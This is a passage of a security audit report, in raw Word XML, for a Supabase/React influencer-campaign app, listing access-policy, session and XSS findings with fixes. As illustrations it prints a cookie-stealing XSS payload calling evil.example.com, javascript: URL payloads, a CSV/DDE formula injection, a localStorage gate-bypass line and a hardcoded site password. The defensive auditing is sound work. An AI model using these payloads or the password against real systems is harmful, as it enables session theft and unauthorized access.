              <w:t xml:space="preserve"> self-only. If creator/business discovery requires public read, add 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profile_visibility = 'public'</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> column or rely on the existing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creator_profiles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business_profiles</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> public visibility flag.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creator_profiles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Public visibility flag added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20250617111927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business_profiles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Same.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user_onboarding_progress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auth.uid() = user_id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campaigns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Public reads only for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 = 'published'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campaign_applications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Tight scoping; creator cannot read other applications.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campaign_invitations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Owner / invitee scoped.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campaign_matches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AI match scores hidden from creators.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campaign_collaborations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Participants only.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application_counter_offers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Sender / recipient scoped.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promotions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Owner-scoped + public read of active.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promotion_submissions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Public can INSERT to active promotions only.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conversations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Active participants only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left_at IS NULL</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">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conversation_participants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Self-join only — no spam invites.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message_reactions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Tied to the (legacy) sender/recipient model — re-audit when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messages</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> policy is fixed.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push_notifications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user_id = auth.uid()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notification_preferences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Same.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file_uploads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Owner / public flag / explicit permission. Watermarked preview path needs to enforce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is_public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file_versions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file_permissions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file_comments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file_tags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file_tag_assignments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Inherit parent file access correctly.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project_reviews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Public/private split correct.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review_responses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Reviewee-only response.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beta_feedback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User-scoped.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feature_flags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Public READ; writes blocked from clients (service-role only).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Recommended hardening for all tables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For every table where unauthenticated access is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> required, add a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">deny-all default</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at the top of the policy stack so that future column additions don't accidentally expose data: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One per table, runs first by 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POLICY "deny_all_default" ON public.&lt;table&gt;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FOR ALL TO public USING (false) WITH CHECK (false);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Subsequent permissive policies are OR-combined, so the deny is harmless when a real policy matches.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Auth, Sessions, Tokens</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 ⚠️ HIGH — React Query cache is not cleared on logout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src/contexts/AuthContext.tsx:363-391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signOut</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) clears auth tokens via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">cleanupAuthState()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, calls </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">supabase.auth.signOut({ scope: 'global' })</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and resets in-memory React state. It does </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> call </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">queryClient.clear()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queryClient.removeQueries()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">QueryClient</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">src/App.tsx:88-98</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> retains all cached query data with a 5-minute </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">staleTime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Impact:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> if user A logs out and user B logs in on the same browser within 5 minutes, the first render after login can show user A's cached data (campaign lists, message previews, applicant info) before fresh queries return. Public computer / shared device → information disclosure.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in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">signOut()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (or in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">useLogout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), call </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">queryClient.clear()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useQueryClient } from "@tanstack/react-query";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const useLogout = ()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queryClient = useQueryClient();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{ signOut } = useAuth();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{ clearChat } = useDonnyContext();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navigate = useNavigate();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return async ()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clearChat();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signOut();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queryClient.clear();         // 👈 add this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navigate('/landing');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MEDIUM — SiteGate password lives in the client bundle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src/pages/SiteGate.tsx:4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SITE_PASSWORD = 'dragoncandy2026';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Anyone who opens DevTools and views the bundled JS can read it. This isn't a "fix the bug" issue — it's a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">fundamental property of client-side gates</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Treat the gate as a friction barrier, not a security control. Sensitive data must still be protected by RLS / edge-function auth, never by SiteGate alone.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the goal is real pre-launch privacy (block crawlers, block casual visitors), keep SiteGate but document this limitation. If the goal is true private preview, gate at the hosting layer (Cloudflare Access, basic-auth via reverse proxy), not in React.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MEDIUM — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">dc_site_unlocked_until</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> survives logout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src/lib/authCleanup.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> removes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">supabase.auth.*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sb-*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> keys from local/sessionStorage but leaves </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">dc_site_unlocked_until</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. If a previous user unlocked the gate on a shared browser, the next user inherits an unlocked session for up to one hour.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src/lib/authCleanup.ts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localStorage.removeItem('dc_site_unlocked_until');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sessionStorage.removeItem('dc_gate_redirect');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MEDIUM — SiteGate bypass via DevTools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localStorage.setItem('dc_site_unlocked_until', String(Date.now() + 365*24*60*60*1000));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…unlocks the site for a year. Trivial and inevitable for a client-side gate. Same fix as 3.2: don't rely on SiteGate for security. Path-traversal bypass (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">/promo/../dashboard/business</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploitable — React Router normalizes paths before they reach the guard.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 ✅ Email verification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supabase/functions/send-verification-email/index.ts:36-38</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: token is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">crypto.randomUUID()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (128-bit entropy, cryptographically secure RNG), expires in 24 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supabase/functions/verify-email/index.ts:86-119</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: rejects when </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">verified_at !== null</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and writes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">verified_at = now()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on success. Reuse is prevented.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lookup uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">.eq('token', token)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which is not constant-time, but the noise floor of network latency dwarfs any timing leak — not a practical concern.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3.6 ✅ Password reset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src/pages/ForgotPassword.tsx:46-48</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">supabase.auth.resetPasswordForEmail()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">src/pages/UpdatePassword.tsx:56</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">supabase.auth.updateUser({ password })</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Both delegate token validation to Supabase Auth — no custom token tracking, no double-reuse risk. Post-update, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">cleanupAuthState()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signOut({ scope: 'global' })</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> forces a fresh login.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3.7 ✅ reCAPTCHA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supabase/functions/verify-recaptcha/index.ts:47-116</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> calls Google's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">siteverify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with the secret key server-side and checks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">verificationResult.success</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Properly enforced in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">src/components/auth/AuthForm.tsx:81-111</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> before signup/login proceeds.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3.8 LOW — Inactivity is client-only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src/hooks/useInactivityTimeout.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the 45 min warning + 15 min logout. If a user closes the laptop without logging out and the access token (default 1 h TTL) is later refreshed by Supabase's auto-refresh, the session can persist indefinitely on a stolen device. Mitigations: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Reduce Supabase JWT TTL to 15-30 min in the project's auth settings.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For high-stakes operations (changing payout bank account, releasing escrow), require fresh auth (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">supabase.auth.getUser()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + a recent re-auth check).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XSS &amp; UGC Rendering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 🔴 CRITICAL — Email templates inject UGC without HTML escaping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supabase/functions/send-notification-email/index.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> interpolates user input directly into HTML strings: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Line 132 — applicantName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&lt;p&gt;Great news! &lt;strong&gt;${data.applicantName}&lt;/strong&gt; has applied...&lt;/p&gt;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Line 146 — campaignTitle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&lt;p&gt;Your application for &lt;strong&gt;"${data.campaignTitle}"&lt;/strong&gt; has been...&lt;/p&gt;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Line 160-163 — senderName + free-text message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&lt;p&gt;You have a new message from &lt;strong&gt;${data.senderName}&lt;/strong&gt;...&lt;/p&gt;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${data.message ? `&lt;blockquote&gt;...${data.message}&lt;/blockquote&gt;` : ''}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Line 370 — campaign description (long-form UGC)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&lt;p style="margin: 0; color: #6B7280;"&gt;${data.description}&lt;/p&gt;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creator who names themselves </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src=x onerror="fetch('https://evil.example.com/?c='+document.cookie)"&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will run that payload in every recipient's email client that supports inline JS / network requests. Most modern email clients (Gmail, Outlook web) sandbox aggressively, but image-loading + tracking-pixel exfiltration is widely supported.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add an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">htmlEscape()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> helper in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">_shared/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and run every interpolated value through it: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htmlEscape = (s: string) =&gt;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String(s ?? '')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.replace(/&amp;/g, '&amp;amp;')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.replace(/&lt;/g, '&amp;lt;')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.replace(/&gt;/g, '&amp;gt;')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.replace(/"/g, '&amp;quot;')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.replace(/'/g, '&amp;#39;');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Then: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&lt;p&gt;Great news! &lt;strong&gt;${htmlEscape(data.applicantName)}&lt;/strong&gt; has applied...&lt;/p&gt;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Audit every variable in the email templates: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">applicantName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campaignTitle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senderName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message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requesterName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uploaderName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likerName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businessName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creatorName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invitationMessage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description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recipientName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party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amount</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Any value that came from a user is in scope.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⚠️ HIGH — Social URLs rendered as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">href</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> without </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">javascript:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> validation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src/components/creator-browse/CreatorProfileModal.tsx:270, 437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src/components/campaigns/RestaurantProfileCard.tsx:98, 107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&lt;a href={profile.website_url} target="_blank" rel="noopener noreferrer"&gt;Website&lt;/a&gt;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&lt;a href={restaurant.instagram_url} target="_blank" rel="noopener noreferrer"&gt;Instagram&lt;/a&gt;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creator who sets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">website_url = "javascript:alert(document.cookie)"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (saved by the existing profile form, persisted via Supabase, rendered to anyone visiting the public profile) → click triggers code execution in the visitor's session.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wrap href values in a sanitizer before rendering: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src/lib/safeUrl.ts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const safeUrl = (raw: string | null | undefined): string | undefined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(!raw) return undefined;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try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url = new URL(raw, window.location.origin);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(url.protocol === 'http:' || url.protocol === 'https:' || url.protocol === 'mailto:')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return url.toString();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catch { /* fallthrough */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return undefined;   // strip invalid / dangerous URLs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Usage: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&lt;a href={safeUrl(profile.website_url)} ...&gt;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Apply to: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">website_url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instagram_url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tiktok_url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facebook_url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linkedin_url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x_url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other_social_url</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, every </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">portfolio_link</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, business </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">website</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, anywhere a user-supplied URL hits an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">href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src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MEDIUM — Donny markdown link href not validated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src/components/donny/DonnyMessage.tsx:70</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> renders a Markdown link from LLM output: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&lt;a href={href} target="_blank" rel="noopener noreferrer"&gt;{children}&lt;/a&gt;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react-markdown</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> itself does not execute HTML, but a Markdown link </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">[click](javascript:alert(1))</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is rendered as a plain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;a href="javascript:..."&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. If Donny is prompt-injected into producing such a link, the click executes JS in the user's session.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apply the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">safeUrl()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> helper to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">href</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> here too, falling back to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> if the URL is unsafe.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4.4 MEDIUM — SVG allowed in profile-image MIME types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src/lib/fileUtils.ts:3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images: ['image/jpeg', 'image/png', 'image/gif', 'image/webp', 'image/svg+xml'],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SVG files can contain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> blocks and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">on*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> event handlers. If served with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: image/svg+xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and rendered inline (not via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), they execute JS in the page's origin. Combined with §3.4's storage-bucket public-read setup, this is a stored-XSS path.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drop </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">image/svg+xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from the allowed list. If SVGs are required for logos, run them through a server-side sanitizer (e.g. DOMPurify in Deno via npm:isomorphic-dompurify) and force </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Disposition: attachment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> when serving.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4.5 MEDIUM — CSV formula injection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src/pages/AdminDragonShareLedger.tsx:50-68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csv = rows.map((r) =&gt; r.join(',')).join('\n');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Rows include creator and org names. A creator named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">=cmd|'/c calc'!A1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> becomes a live formula in Excel. CSV injection / DDE attack.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prefix any cell whose first character is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">=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+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-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">@</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with a single quote </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and quote/escape values containing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">,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"</w:t>
      </w:r>
      <w:r>
